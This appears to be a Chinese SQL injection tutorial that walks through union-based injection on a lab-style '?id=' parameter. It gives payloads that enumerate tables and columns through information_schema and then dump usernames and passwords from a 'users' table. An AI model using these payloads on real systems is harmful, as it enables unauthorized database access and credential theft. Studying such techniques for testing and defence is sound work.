什么是union
Union:对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序;
union注入
查询表名
information_schema数据库包含两个表,一个是tables存放数据库中所有的表,另一个是columns用来存放所有的列名
使用如下命令查询数据库表名
?id=' union select 1,table_name,3 from information_schema.tables --+
得到如下结果
但我们查询information_schema中tables表发现我们刚才得出的结果没有意义
此时我们加入查询语句
?id=' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+
成功查出表名
但我们现在只查出这一个表名,但数据库中有很多表,这时我们要用group_concat(),那么什么是group_concat呢 group_concat(),手册上说明:该函数返回带有来自一个组的连接的非NULL值的字符串结果。
通俗点理解,其实是这样的:group_concat()会计算哪些行属于同一组,将属于同一组的列合并显示出来。要返回哪些列,由函数参数(就是字段名)决定。分组必须有个标准,就是根据group by指定的列进行分组。
合并的字段分隔符默认为逗号,可通过参数separator指定。
使table_name被group_concat()包裹起来
?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
得到所有数据库表名
查询列名
查询到表名之后我们就要查询列名了,我们要查找users的信息
?id=-2' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
得到列名
最终目标:拿到数据
已知数据库表名、列名再得到数据就简单了,使用基础查询语句即可
?id=-2' union select 1,2,group_concat(id,username,password) from users --+
得到账号密码等数据